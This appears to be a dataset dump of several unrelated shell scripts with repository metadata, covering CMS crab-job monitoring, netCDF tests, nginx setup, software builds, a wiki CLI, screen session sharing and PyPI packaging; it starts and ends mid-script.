	if [ $# -lt 1 ] ; then
		echo Enter the directory of the crab job being checked as the sole argument
		jobChecker="3"
	fi
	# NOTE(review): the first check runs `crab status $1` while the others
	# use `crab status -d $1` — confirm both forms address the same job.
	if crab status $1 | grep "Publication status:" | grep "100.0%"
	then
		echo "0"
		jobChecker="0"
	elif crab status -d $1 | grep -e "running.*)"
	then
		echo "2"
		jobChecker="2"
	elif crab status -d $1 | grep -e "idle"
	then
		echo "2"
		jobChecker="2"
	else
		echo "1"
		jobChecker="1"
	fi
}
#particle=''
minMass=''
maxMass=''
lambda=''
#helicity=''
date=''
stepName=''
jobChecker=''
textFileDir="$PWD/textFiles/"
# Walk every tracking file. Each file starts with a header line holding the
# sample parameters (minMass maxMass lambda date) followed by one line per
# crab production step still in flight; completed/advanced steps are
# blanked out and handed to moveOnCopy.sh / resubmitJobsNew.sh.
for file in $PWD/textFiles/*.txt
do
echo "fileName "$file
lineNum=-1
# NOTE(review): the pipe puts the while-loop in a subshell, so any
# variable updates made inside it are lost after the loop.
cat $file | while read line
#echo "Text read from file: $line"
do
lineNum=$(($lineNum+1))
i=0
# Split the current line into the obj[] word array.
for object in $line
do
obj[$i]=$object
echo ${obj[$i]}
i=$((i+1))
done
if [ "${obj[0]}" == " " ]
then
break 2
fi
# Header line: the first token is one of the known minimum masses.
if [ "${obj[0]}" == "300" ] || [ "${obj[0]}" == "800" ] || [ "${obj[0]}" == "1300" ] || [ "${obj[0]}" == "2000" ]
then
# particle="${obj[0]}"
minMass="${obj[0]}"
maxMass="${obj[1]}"
lambda="${obj[2]}"
# helicity="${obj[4]}"
date="${obj[3]}"
continue
fi
# Step line: translate the config name to the short step name and build
# the crab project directory for this sample + step.
stepNameOld=${obj[0]}
stepShort "$stepNameOld"
echo "stepNameOld: "$stepNameOld
echo "stepName: "$stepName
crabProjectName=$PWD'/'$stepNameOld'/crab_projects/crab_'$stepName'_M'$minMass'to'$maxMass'_LED_L'$lambda'_13TeV_'$date
shortCrabProjectName='crab_'$stepName'_M'$minMass'to'$maxMass'_LED_L'$lambda'_13TeV_'$date
echo "our crab project name is " $crabProjectName
fullTextFile="$file"
#echo 'crabProjectName '$crabProjectName
#Check if we need to move on, unless it is the miniAODSIM, in which case it does not need to proceed
jobCheck "$crabProjectName"
if [ "$jobChecker" == "0" ]
then
if [ "$stepName" != 'miniAODSIM_CrabConfig' ]
then
echo "in here"
newLine=$(($lineNum+1))
obj[0]=" "
/uscms/home/avanderp/nobackup/CMSSW_9_3_6/src/GenStudy/Dimuon/test/moveOnCopy.sh $newLine "$stepNameOld" "$fullTextFile" "$minMass" "$maxMass" "$lambda" "$date"
fi
#If the job is completed on miniAOD, then this adds to the completeCounter
# NOTE(review): this elif repeats the "0" test of the branch above, so it
# is unreachable and the "is completed!" message never prints.
elif [ "$jobChecker" == "0" ]
then
echo jobChecker was 0
if [ "$stepName" == 'miniAODSIM_CrabConfig' ]
then
obj[0]=" "
echo $crabProjectName 'is completed!'
fi
#Check to resubmit jobs
elif [ "$jobChecker" == "1" ]
then
cur=$PWD
echo jobChecker was 1
echo $crabProjectName
/uscms/home/avanderp/nobackup/CMSSW_9_3_6/src/GenStudy/Dimuon/test/resubmitJobsNew.sh $stepNameOld $shortCrabProjectName
# NOTE(review): $crabProject is never assigned (likely meant
# $crabProjectName); an empty argument makes this `cd` go to $HOME.
cd $crabProject
echo $crabProjectName ' is being resubmitted to step ' $stepName
cd $cur
obj[0]=" "
#If the job is still running, then this adds to the runningCounter
elif [ "$jobChecker" == "2" ]
then
echo jobChecker was 2
echo $crabProjectName ' is still runnning on step ' $stepName
obj[0]=" "
else
echo "Nothing Matched! :("
obj[0]=" "
fi
if [ "${obj[0]}" == "genSimCrabConfig" ] || [ "${obj[0]}" == "recoCrabConfig" ] || [ "${obj[0]}" == "aodCrabConfig" ] || [ "${obj[0]}" == "miniAODSIM_crabConfig" ]
then
obj[0]=" "
fi
done
done
| true
|
e23da96175becfbdc3c6f201a18213a42a098950
|
Shell
|
rubensayshi/bashtools
|
/gitgrepall.sh
|
UTF-8
| 111
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
# Run a git pickaxe search (`git log -p -S<term>`) in every repository
# directly below the current directory.
#
# Arguments:
#   $1 - string to search for in added/removed lines (git log -S)
#
# Fixes over the original: iterate directories via a glob instead of
# parsing `ls` (which also yielded plain files), and run git inside a
# subshell guarded by the `cd` — previously, when `cd` failed, git ran in
# the PARENT directory and the following `cd ..` walked the tree upward.
for dir in */; do
	>&2 echo "$dir"
	(
		cd "$dir" || exit
		git --no-pager log -p -S"$1"
	)
done
| true
|
70b5aa7274dfd0857598a9134ebf762d6e96af5c
|
Shell
|
jinyun1tang/netcdf-c
|
/dap4_test/test_meta.sh
|
UTF-8
| 1,575
| 3.234375
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# DAP4 metadata regression test: translate each raw .dmr test file with
# test_meta, dump the result with ncdump and compare against (or reset)
# the stored baselines; optionally diff against the CDL reference files.
if test "x$srcdir" = x ; then srcdir=`pwd`; fi
. ../test_common.sh
. ${srcdir}/d4test_common.sh
echo "test_meta.sh:"
set -e
computetestablefiles
# Collect the stems for which a CDL reference file exists.
CDL=
for f in ${F} ; do
STEM=`echo $f | cut -d. -f 1`
if test -e ${CDLTESTFILES}/${STEM}.cdl ; then
CDL="${CDL} ${STEM}"
else
echo "Not found: ${CDLTESTFILES}/${STEM}.cdl; ignored"
fi
done
if test "x${RESET}" = x1 ; then rm -fr ${BASELINE}/*.d4m ; fi
setresultdir results_test_meta
for f in ${F} ; do
echo "checking: $f"
if ! ${VG} ${execdir}/test_meta ${RAWTESTFILES}/${f}.dmr ${builddir}/results_test_meta/${f} ; then
failure "${execdir}/test_meta ${RAWTESTFILES}/${f}.dmr ${builddir}/results_test_meta/${f}"
fi
${NCDUMP} ${DUMPFLAGS} -h ${builddir}/results_test_meta/${f} > ${builddir}/results_test_meta/${f}.d4m
if test "x${TEST}" = x1 ; then
if ! diff -wBb ${BASELINE}/${f}.d4m ${builddir}/results_test_meta/${f}.d4m ; then
failure "diff -wBb ${BASELINE}/${f}.ncdump ${builddir}/results_test_meta/${f}.d4m"
fi
elif test "x${RESET}" = x1 ; then
echo "${f}:"
cp ${builddir}/results_test_meta/${f}.d4m ${BASELINE}/${f}.d4m
fi
done
if test "x${CDLDIFF}" = x1 ; then
for f in $CDL ; do
echo "diff -wBb ${CDLTESTFILES}/${f}.cdl ${builddir}/results_test_meta/${f}.d4m"
rm -f ${builddir}/tmp
# Bug fix: the original had a stray line continuation here —
#   cat file.cdl \
#   cat > tmp
# which ran `cat file.cdl cat > tmp` and emitted "cat: cat: No such
# file". Copy the CDL file into tmp directly instead.
cat ${CDLTESTFILES}/${f}.cdl > ${builddir}/tmp
echo diff -wBbu ${builddir}/tmp ${builddir}/results_test_meta/${f}.d4m
if ! diff -wBbu ${builddir}/tmp ${builddir}/results_test_meta/${f}.d4m ; then
failure "${f}"
fi
done
fi
finish
| true
|
3f638255f0117688c15ddc6558fdb9150cec3189
|
Shell
|
aDENTinTIME/holberton-system_engineering-devops
|
/0x0B-web_server/3-redirection
|
UTF-8
| 382
| 2.546875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Installs nginx, and creates a redirect page
sudo apt-get update
# Bug fix: apt package names are case-sensitive; "Nginx" does not exist —
# the package is "nginx".
sudo apt-get install nginx -y
echo "Holberton School" | sudo tee /usr/share/nginx/html/index.html
# Insert a /redirect_me location (301 to the video) just before the
# default "location / {" block of the stock site config.
sudo sed -i "s/^\slocation \/ {$/\tlocation \/redirect_me {\n\t\treturn 301 https:\/\/youtu.be\/Sagg08DrO5U;\n\t}\n\n\tlocation \/ {/" /etc/nginx/sites-available/default
sudo service nginx restart
| true
|
29af502eaa5fc5fb833ed238eda207e25ca68dcf
|
Shell
|
StefanCristian/argent-server
|
/app-misc/argent-mce/files/1.1/bin/argent-mce-start
|
UTF-8
| 523
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/sh
# Launcher for the Argent MCE session: makes sure samba is running, kills
# any previous MCE X session, then starts a new one as the dedicated user.
# NOTE(review): `[[` and `&>` are bashisms under a #!/bin/sh shebang — this
# works only when /bin/sh is bash.
# setup
myxinitrc="/usr/bin/argent-mce-session"
myuser="argentmce"
mcepid="/var/argentmce/.mcepid"
# make sure samba is started
[[ -f "/etc/init.d/samba" ]] && /etc/init.d/samba start &> /dev/null
# Kill previous instance running since
# /etc/init.d/xdm does not support PIDFILE for
# custom DISPLAYMANAGER
[[ -f "$mcepid" ]] && kill $(cat $mcepid) &> /dev/null
# spawn!
# Record our own PID, then start X for the MCE user in the background with
# a login environment (/etc/profile sourced).
echo $$ > /var/run/argent-mce-start.pid
su - ${myuser} -c "source /etc/profile && /usr/bin/argent-mce-startx ${myxinitrc} &> /dev/null" &
| true
|
5666265d50a11b01b66b191dd83c31e7cd47492a
|
Shell
|
wuhp/lfs7.5
|
/build-temp-system/build-expect-2.sh
|
UTF-8
| 367
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# LFS temporary-toolchain step: unpack and build expect 5.45 into /tools,
# linking it against the /tools Tcl built in the previous step.
export SOURCE="expect5.45"
# Bug fix: the original used a single `&` ("[ -d ... ] & rm -rf ..."),
# which backgrounded the directory test and ran rm unconditionally; the
# intent is clearly "remove the old tree only if it exists".
[ -d "${SOURCE}" ] && rm -rf "${SOURCE}"
tar -zxf ../sources/expect5.45.tar.gz
cd ${SOURCE}
# Point expect's hard-coded /usr/local/bin references at /bin.
cp -v configure{,.orig}
sed 's:/usr/local/bin:/bin:' configure.orig > configure
./configure --prefix=/tools \
            --with-tcl=/tools/lib \
            --with-tclinclude=/tools/include
make
#make test
# SCRIPTS="" prevents installation of the supplementary expect scripts.
make SCRIPTS="" install
| true
|
adb10f3714214e7ed82f131753078a0a6bb173bf
|
Shell
|
jjwilcoxson/envoy
|
/ci/build_container/build_recipes/googletest.sh
|
UTF-8
| 264
| 2.65625
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# CI build recipe: download, build and install googletest 1.8.0 into
# $THIRDPARTY_BUILD (expected to be exported by the surrounding CI setup).
set -e
VERSION=release-1.8.0
wget -O googletest-$VERSION.tar.gz https://github.com/google/googletest/archive/$VERSION.tar.gz
tar xf googletest-$VERSION.tar.gz
cd googletest-$VERSION
cmake -DCMAKE_INSTALL_PREFIX:PATH=$THIRDPARTY_BUILD .
make install
| true
|
a543c1d08c8856f755bc7790fce94f21811d14ae
|
Shell
|
Joe-Marchesini/CSI-230
|
/other/hostlookup.sh
|
UTF-8
| 438
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/bash
# file hostlookup.sh
# brief Takes file input with host names and checks if they are valid hosts.
# author joeseph.marchesini
# lab 6.2
# date 10/15/2020
# Print how this script is invoked.
# (Bug fix: original text read "usgae: [-f input filed]".)
usage()
{
	echo "$0 usage: [-f input file]"
}
while getopts ":f:" options;
do
	# Bug fix: the original had no case on $options, so any flag —
	# including invalid ones — was treated as -f. Handle -f explicitly
	# and show usage for everything else.
	case "$options" in
	f)
		f=${OPTARG}
		# Resolve each hostname (one per line) from the input file.
		while read -r h;
		do
			# host -W1: wait at most 1s; -t A: query A records only.
			if out=$(host -W1 -t A "$h"); then
				# 4th field of "name has address x.x.x.x" is the IP.
				ip=$(echo "$out" | cut -d " " -f 4)
				echo "${h},${ip}"
			else
				echo "${h}, not found"
			fi
		done < "$f"
		;;
	*)
		usage
		exit 2
		;;
	esac
done
| true
|
94c8861d8dfde224f0f60100f37d0bbe90afd962
|
Shell
|
forbesmyester/pernote
|
/pernote
|
UTF-8
| 7,311
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
# pernote — command-line front end for per-wiki markdown notes.
# The commented block below is an abandoned experiment for locating the
# index helper relative to the script / a basher install; kept for reference.
# POSSIBLE_INDEX_LOCATIONS=("$( cd "$(dirname "$0")" ; pwd -P )")
# if command -v basher; then
# echo bb
# POSSIBLE_INDEX_LOCATIONS+=("$(basher package-path forbesmyester/pernote)")
# echo bob
# fi
# for PP in "${POSSIBLE_INDEX_LOCATIONS[@]}";do
# echo ">> $PP"
# done
# Strict mode: abort on errors/unset vars/pipe failures; split only on
# newline and tab.
set -euo pipefail
IFS=$'\n\t'
show_help() {
    # Print usage and the list of available actions to stdout.
    cat <<EOF
$0 Interact with personal wiki files

Usage:

    $0 WIKI_NAME ACTION OPTION

Examples:

    $0 WIKI_NAME new/n - Create an entry
    $0 WIKI_NAME filename/f - Search for filename
    $0 WIKI_NAME date/d [DATE_STR] - Open note for a day
    $0 WIKI_NAME content/c - Search for content
    $0 WIKI_NAME buildindex/b - Build index
    $0 WIKI_NAME searchindex/s - Search the index
    $0 WIKI_NAME git/g - Interact with git
    $0 WIKI_NAME remotesync/r - Synchronize with GIT repository
    $0 WIKI_NAME installdeps/i - Install dependencies

EOF
}
function new {
    # Prompt for a new note name on stdin. Echoes "<name>.md", or an empty
    # string when the user entered nothing.
    read -r -p "Please enter new name: " F
    # Append the markdown extension only when a name was actually given.
    if [ -n "$F" ]; then
        F="$F.md"
    fi
    printf '%s\n' "$F"
}
function get_wiki_path {
    # Resolve a wiki name (or unique prefix) to its directory using the
    # ~/.pernote config, which holds one "name:/path" entry per line.
    # Exits non-zero when the config is missing, nothing matches, or the
    # prefix matches more than one wiki.
    local matches
    local cfg="$HOME/.pernote"
    if [ ! -f "$cfg" ]; then
        echo "ERROR: No config file found." 1>&2
        echo "" 1>&2
        echo "Please run 'echo \"personal:/home/$USER/Documents/Personal Wiki\" > ~/.pernote'" 1>&2
        exit 1
    fi
    # Keep only the path portion of every entry whose name starts with $1.
    if ! matches="$(grep "^$1" "$cfg" | sed 's/^[^:]\+://')"; then
        echo "Error: Input '${1}' resolves to no wikis" 1>&2
        exit 1
    fi
    # More than one surviving line means the prefix was ambiguous.
    if [ "$(echo "$matches" | wc -l)" -gt 1 ]; then
        echo "Error: Input '${1}' resolves to multiple wikis" 1>&2
        exit 1
    fi
    echo "$matches"
}
function search_date {
    # Pick a diary note by date. With an explicit date string ($2), just
    # validate/normalise it and echo "<ISO date>.md". Otherwise run fzf
    # over the existing diary entries (newest first) with today pinned on
    # top and "<NEW>" appended as a create option.
    local DIRECTORY
    local DATE
    DIRECTORY=$1
    DATE=$(date -I)
    if [ $# -gt 1 ]; then
        # Normalise any `date -d` parsable string to ISO (YYYY-MM-DD).
        if ! DATE="$(date -I -d "$2" 2>/dev/null)"; then
            echo "Invalid date '${2}'" 1>&2
            exit 1
        fi
        echo "${DATE}.md"
        return 0
    fi
    # List diary/*.md stems, drop today's (re-inserted at the top), append
    # the <NEW> sentinel and let the user fuzzy-pick one.
    if ! DATE=$(\
        find "$DIRECTORY" -type f -name "*.md" -printf '%P\n' | \
        grep "^diary/" | \
        sed 's/\.md$//' | \
        grep -v "^diary/${DATE}$" | \
        sort -r |
        sed "1 idiary/$DATE" | \
        sed '$a<NEW>' | \
        run_fzf "${@:2}" \
        ); then
        exit 1
    fi
    if [[ "$DATE" == '<NEW>' ]]; then
        echo "$DATE"
        return 0
    fi
    echo "${DATE}.md"
}
function run_fzf {
    # Launch fzf, seeding the query with the first argument when one is given.
    case "$#" in
        0) fzf --ansi ;;
        *) fzf --ansi -q "$1" ;;
    esac
}
function search_filename {
    # Fuzzy-pick any note in the wiki by filename. Today's diary entry is
    # pinned to the top and "<NEW>" is appended as a create option.
    # Echoes the chosen path with the .md extension restored.
    local DIRECTORY
    local NAME
    local DATE
    DIRECTORY=$1
    DATE=$(date -I)
    if ! NAME=$(\
        find "$DIRECTORY" -type f -name "*.md" -printf '%P\n' | \
        sed 's/\.md$//' | \
        grep -v "^diary/${DATE}$" | \
        sort |
        sed "1 idiary/$DATE" | \
        sed '$a<NEW>' | \
        run_fzf "${@:2}" \
        ); then
        exit 1
    fi
    if [[ "$NAME" == '<NEW>' ]]; then
        # Bug fix: was `echo $(new)` — the unquoted substitution would
        # word-split (and glob) a name containing spaces; call new
        # directly so its output passes through untouched.
        new
        return 0
    fi
    echo "${NAME}.md"
}
function search_searchindex {
    # Fuzzy-search the prebuilt "$1/.pernote-index". Index lines look like
    # "type :: source : ... :: target". Heading/broken-link entries open
    # the source note directly; for link entries a whiptail menu lets the
    # user choose between the source note and the link target.
    local FOUND
    local TYPE
    local TARGET
    local WIDTH
    local SOURCE
    FOUND=""
    if [ "$#" -gt 1 ]; then
        FOUND=$(fzf --ansi -q "${@:2}" < "$1/.pernote-index")
    else
        FOUND=$(fzf --ansi < "$1/.pernote-index")
    fi
    if [ ${#FOUND} -eq 0 ]; then
        echo ""
        return
    fi
    # Parse the selection: first column is the entry type, the text after
    # the final "::" is the link target, and the second column the source.
    TYPE=$(echo "$FOUND" | sed 's/:.*//' | sed 's/ *$//')
    TARGET=$(echo "$FOUND" | sed 's/.*:: *//' | sed 's/ *$//')
    SOURCE=$(echo "$FOUND" | sed 's/^[a-z_]\+ *:\+ *//' | sed 's/:.*//' | sed 's/ *$//')
    if [ "$TYPE" == "head" ] || [ "$TYPE" == "bad_link" ]; then
        echo "${SOURCE}.md"
        return
    fi
    # Ask whether to open the source note or the link target; whiptail's
    # choice comes back on stderr, hence the 3>&1 1>&2 2>&3 swap.
    WIDTH=$(tput cols)
    WIDTH=$((WIDTH-10))
    SELECTION=$(whiptail --title "Which do you want to open?" --notags --fb --menu --nocancel "Open source or target?" 15 "$WIDTH" 3 "s" "Source: $SOURCE" "t" "Target: $TARGET" 3>&1 1>&2 2>&3)
    FOUND="${SOURCE}.md"
    if [ "$SELECTION" == 't' ]; then
        FOUND="$TARGET"
    fi
    echo "$FOUND"
}
function search_content {
    # Full-text search across the wiki: ripgrep every markdown file in $1,
    # fuzzy-filter the hits, then echo just the chosen file's name with
    # the .md extension restored.
    local OUT
    # --color=always --line-number
    if ! OUT="$(cd "$1" && rg --no-line-number --column --no-heading --type markdown . | sed 's/^\([^:]\+\)\.md:1:/\1: /' | run_fzf "${@:2}")"; then
        exit 1
    fi
    # Strip everything from the first ":" onward to recover the file stem.
    echo "${OUT//\:*/}.md"
}
function run_git {
    # Run an arbitrary git command (the remaining arguments) from inside
    # the wiki directory given as the first argument.
    local wiki_dir="$1"
    shift
    cd "$wiki_dir"
    git "$@"
}
function action_match {
    # Expand a (possibly abbreviated, possibly concatenated) action string
    # into full action names. $1 names the array of known actions, $2 is
    # the raw user input, $3 names the output array (bash namerefs).
    # Each pass tries every action both as a full-name prefix and as a
    # one-letter prefix (with an optional "-" separator), consuming the
    # matched text; passes repeat until nothing more matches, so e.g.
    # "gr" expands to git + remotesync.
    # NOTE(review): MATCH_COUNT is deliberately non-local here (global).
    local -n CONFIG="$1"
    local INPUT="$2"
    local -n RESULT=$3
    MATCH_COUNT=1
    while [ $MATCH_COUNT -gt 0 ]; do
        MATCH_COUNT=0
        for ACT in "${CONFIG[@]}"; do
            # Try the full action name, optionally followed by "-".
            RE="^$ACT\-?(.*)"
            if [[ "$INPUT" =~ $RE ]]; then
                MATCH_COUNT=$(( MATCH_COUNT + 1 ))
                RESULT+=("$ACT")
                INPUT="${BASH_REMATCH[1]}"
            fi
            # Try the single-letter abbreviation of the action name.
            RE="^${ACT:0:1}\-?(.*)"
            if [[ "$INPUT" =~ $RE ]]; then
                MATCH_COUNT=$(( MATCH_COUNT + 1 ))
                RESULT+=("$ACT")
                INPUT="${BASH_REMATCH[1]}"
            fi
        done
    done
}
function execute_find {
    # Dispatch to the search_<ACTION> helper for wiki $2, forwarding any
    # remaining arguments, and echo the document it selected.
    local ACTION=$1
    local WIKI="$2"
    local RET
    if ! RET="$("search_$ACTION" "$WIKI" "${@:3}")"; then
        # Bug fix: the error message used to go to stdout, where it was
        # swallowed by the caller's $() capture instead of being shown.
        echo "Could not get document" >&2
        exit 1
    fi
    echo "$RET"
}
# Entry point: $1 is the wiki name, $2 one or more (abbreviated) actions.
if [ $# -lt 2 ]; then
    show_help
    exit 1
fi
# shellcheck disable=SC2034 # Not Unused - BASH pass by name
ACTION_CONFIG=("new" "filename" "date" "content" "buildindex" "searchindex"
    "git" "remotesync" "help" "installdeps")
declare -a ACTIONS
# Expand the (abbreviated, possibly concatenated) action argument.
action_match ACTION_CONFIG "$2" ACTIONS
if [ ${#ACTIONS[@]} -eq 0 ]; then
    exit 1
fi
WIKI=$(get_wiki_path "$1");
for ACTION in "${ACTIONS[@]}"; do
    if [ "$ACTION" == "help" ]; then
        show_help
        continue
    fi
    if [ "$ACTION" == "git" ]; then
        run_git "$WIKI" "${@:3}"
        continue
    fi
    if [ "$ACTION" == "installdeps" ]; then
        # Install the index builder only when it is not already on PATH.
        if ! OPTS="$(which pernote-index)"; then
            npm install -g pernote-index
        fi
        continue
    fi
    if [ "$ACTION" == "buildindex" ]; then
        pernote-index -r "$WIKI" > "${WIKI}/.pernote-index"
        continue
    fi
    if [ "$ACTION" == "remotesync" ]; then
        # Best-effort commit/pull/push: each step may fail (nothing to
        # commit, no remote, ...) without aborting under `set -e`.
        echo git -C "$WIKI" add .
        git -C "$WIKI" add .
        echo git -C "$WIKI" commit -m 'commit'
        git -C "$WIKI" commit -m 'commit' || true
        echo git -C "$WIKI" pull
        git -C "$WIKI" pull --no-edit || true
        echo git -C "$WIKI" push
        git -C "$WIKI" push || true
        continue
    fi
    # The remaining actions resolve to a document name in FOUND.
    FOUND=""
    if [ "$ACTION" == "date" ] || [ "$ACTION" == "searchindex" ] || [ "$ACTION" == "filename" ] || [ "$ACTION" == "content" ]; then
        if ! FOUND=$(execute_find "$ACTION" "$WIKI" "${@:3}"); then
            echo "Could not get document"
            exit 1
        fi
    fi
    if [ "$ACTION" == "new" ]; then
        FOUND=$(new)
    fi
    if [ ${#FOUND} -eq 0 ]; then
        echo "Was expecting a document name but found nothing"
        exit 1
    fi
    # A selected link target may be an external URL: open it and stop.
    WEBSITE_RE='^https?\:\/\/'
    if [[ "$FOUND" =~ $WEBSITE_RE ]]; then
        xdg-open "$FOUND"
        exit 0
    fi
    # Otherwise make sure the note's directory exists and open it.
    mkdir -p "$WIKI/$(dirname "$FOUND")"
    cd "${WIKI}"
    $EDITOR "${FOUND}"
done
| true
|
57d790a0c0ed5423492fa6870cf1b7bcd730c5b1
|
Shell
|
patrickkeCN/CI-All
|
/ci/setupContainer.sh
|
UTF-8
| 392
| 2.75
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Wire up freshly started CI containers: configure Gerrit and Jenkins,
# then restart the Nginx proxy so the services become reachable.
set -e
# Add common variables.
echo ">>>> Import common variables."
source ~/ci/commonVar.sh
#Create administrator in Gerrit.
echo ">>>> Setup Gerrit."
source ~/gerrit-docker/addGerritUser.sh
#Integrate Jenkins with Gerrit.
echo ">>>> Setup Jenkins."
source ~/jenkins-docker/setupJenkins.sh
#Restart Nginx proxy.
echo ">>>> Restart Nginx proxy."
# NGINX_NAME is expected to be defined by commonVar.sh sourced above.
docker restart ${NGINX_NAME}
| true
|
76c7f442bdeb9ef04c3f40d74a1764e7f8d74415
|
Shell
|
KXStudio/KXStudio
|
/scripts/old/update-git-deb
|
UTF-8
| 838
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
# Script to automatically update git based debs and rebuild
# Please do the upload yourself, as this may take some time...
export LANG="C"
ALL=`ls`
# Run the action against all folders
for i in $ALL; do
  if [ -d $i/.git ]; then
    cd $i
    # Package version type
    # Derive the upstream version part from the newest changelog entry:
    # strip "(", rewrite a "lucid" suffix to "maverick", cut at ")".
    # NOTE(review): this assumes the usual debian/changelog first line
    # "pkg (version) dist; urgency=..." — confirm for each package.
    DEBIAN=`cat debian/changelog | head -n 1 | awk '{printf$2}' | awk 'sub("\\\(","")' | awk 'sub("lucid","maverick")' | awk 'sub("\\\)","\n")' | head -n 1`
    DATE=`date +"20%y%m%d"`
    # Check if it has updates
    TEST_GIT=`git pull`
    if [ "$TEST_GIT" != "Already up-to-date." ]; then
      echo "New Git Available!!"
      echo "RUNNING AUTO-SCRIPT NOW!"
      # Version scheme: <upstream><YYYYMMDD>-0~ppa1
      VERSION="$DEBIAN""$DATE""-0~ppa1"
      dch -v $VERSION "New Git (scripted)"
      debuild -S -sa
    else
      echo "New Git NOT available..."
    fi
    cd ..
  fi
done
| true
|
aef1c82c62a0221e8939bb1d28f40505f4100c9b
|
Shell
|
ongmark/LibreSignage
|
/build/scripts/fancyread.sh
|
UTF-8
| 706
| 4.59375
| 5
|
[
"BSD-3-Clause",
"CC-BY-4.0",
"OFL-1.1",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/sh
#
# Read user input from STDIN. If the user input is empty,
# echo a default value. An arbitary number of allowed values
# can also be specified.
#
# $1 = Prompt string. The default value is added to this.
# $2 = Default value.
#
# All remaining arguments are considered allowed values.
#
fancyread() {
	prompt="$1"
	default="$2"
	tmp=""
	ret=""
	shift 2
	# Show the allowed values, slash-separated, inside the prompt.
	if [ -n "$1" ]; then
		tmp=" ($(echo "$@" | sed 's: :/:g'))"
	fi
	read -p "$prompt$tmp [default: $default]: " ret
	# Empty answer -> the default value, printed exactly once.
	# (Bug fix: the original fell through to the trailing echo as well,
	# emitting a stray blank line after the default.)
	if [ -z "$ret" ]; then
		echo "$default"
		return 0
	fi
	# With an allow-list, reject anything not contained in it.
	if [ -n "$1" ]; then
		case "$@" in
			*"$ret"*)
				# accepted; printed once below
				# (Bug fix: the original echoed here AND at the end,
				# so accepted answers were printed twice.)
				;;
			*)
				echo "[Error] Expected one of: $@" > /dev/stderr
				exit 1
				;;
		esac
	fi
	echo "$ret"
}
| true
|
81a2b3d94305fe1dae35f906309a7f272646e9c8
|
Shell
|
kruger/config
|
/bin/session_make
|
UTF-8
| 2,270
| 3.859375
| 4
|
[] |
no_license
|
#!/bin/bash
#------------------------------------------------------------------
# Script: make_session      Author: Scott Kruger
# Usage:  make_session usernames
# Description:
#   This script and the associated join_session automate the use
#   of the multi-user feature of the screen program.  It
#   essentially automates the management of the acl and session
#   names.
#------------------------------------------------------------------
#------------------------------------------------------------------
# script configuration
# NOTE: hardstatus line modified.  See below.
#------------------------------------------------------------------
shell_title="Welcome: "     # Useful if screenrc displays shell title
screenrc="$HOME/.screenrc"
# These files must match what's in join_session
tmp_screenrc="/tmp/tmpscreenrc"
tmp_session_name="/tmp/session_name"
#------------------------------------------------------------------
# Check usage
#------------------------------------------------------------------
if [ "$#" -lt 1 ]
then
  echo "Usage: $0 usernames"
  exit
else
  # Join all usernames with commas for screen's addacl command.
  other_users=`echo $@ | tr ' ' ','`
fi
#------------------------------------------------------------------
# Create a temporary screenrc that contains the users default
# screenrc plus the multiuser commands.
#------------------------------------------------------------------
if [ -e $screenrc ]; then
  cp $screenrc $tmp_screenrc
elif [ -e $tmp_screenrc ]; then
  rm $tmp_screenrc
fi
# Append the multi-user setup: enable multiuser mode, grant the named
# users access, show an exit hint in the status line, then detach.
cat >> $tmp_screenrc << EOS
shelltitle $shell_title
multiuser on
addacl $other_users
hardstatus alwayslastline "%{RY}%16=To exit: 'Control-a d' %50=%{Gb}%70= %M %d %c%="
detach
EOS
#------------------------------------------------------------------
# Start up screen with temporary screenrc.  Note that it detaches
#------------------------------------------------------------------
screen -c $tmp_screenrc
#------------------------------------------------------------------
# Save session info in temp file for join_session script to use
#------------------------------------------------------------------
screen -ls > $tmp_session_name
#------------------------------------------------------------------
# Rejoin that session
#------------------------------------------------------------------
screen -r
| true
|
6a51a074bb21d4e1542b1b2898828041dcdb947d
|
Shell
|
scjurgen/pyfeld
|
/pack.sh
|
UTF-8
| 672
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Release helper for pyfeld: check that the version strings in setup.py
# and pyfeld/rfcmd.py agree, rebuild the distribution from scratch and
# upload it with twine.
versionsetup=`grep "this_version =" setup.py | sed "s/^.*version = ['\"]\([0-9ab.]*\)['\"].*$/\\1/g"`
versionrfcmd=`grep "version =" pyfeld/rfcmd.py | sed "s/^.*version = ['\"]\([0-9ab.]*\)['\"].*$/\\1/g" `
echo rfcmd: ${versionrfcmd}
echo setup.py ${versionsetup}
# Refuse to pack when the two version declarations have drifted apart;
# open both files at the relevant lines so they can be fixed by hand.
if [ "$versionrfcmd" != "$versionsetup" ]
then
    echo "The version are different, please update them before packing"
    sleep 2
    vi pyfeld/rfcmd.py +19
    vi setup.py +20
    exit -1
fi
# Clean every previous build artifact (may be root-owned from prior runs).
sudo rm -rf pyfeld.egg-info
sudo rm -rf dist
sudo rm -rf build
python3 setup.py build
python3 setup.py dist
python3 setup.py sdist
#python setup.py bdist_wheel
twine upload dist/*
| true
|
fb36055394d9317e92ac3ede706a5ace17068c72
|
Shell
|
hylcugb/isoplotter
|
/compare_versions.sh
|
UTF-8
| 2,414
| 4.28125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# This script will run both versions of isoplotter and compare their output.
#
# Warning! Version 1 can only process uncompressed FASTA. Also, please only
# use one sequence per FASTA.
#
set -e
#
# Analysis configuration
#
# useful if you just want to run the comparison code.
skip_analysis=false
#
# Input files
#
# With no arguments, fall back to hard-coded chromosome files on the
# author's machine, else print usage and exit.
# NOTE(review): when arguments ARE given, $fastas is never assigned from
# them — the later loops iterate an empty list; confirm whether
# `fastas="$@"` was intended here.
if [ -z $1 ]; then
    # See if we're on Sean's machine.
    if [ -e /media/student/poly/genome/fa/chr1.fa ]; then
        fastas=$(echo /media/student/poly/genome/fa/chr{{1..22},X,Y}.fa)
    else
        echo "usage: $(basename $0) fasta_file..."
        exit 1
    fi
fi
#
# Setup filesystem structure for version1
#
outdir=/tmp/isoplotter-compare

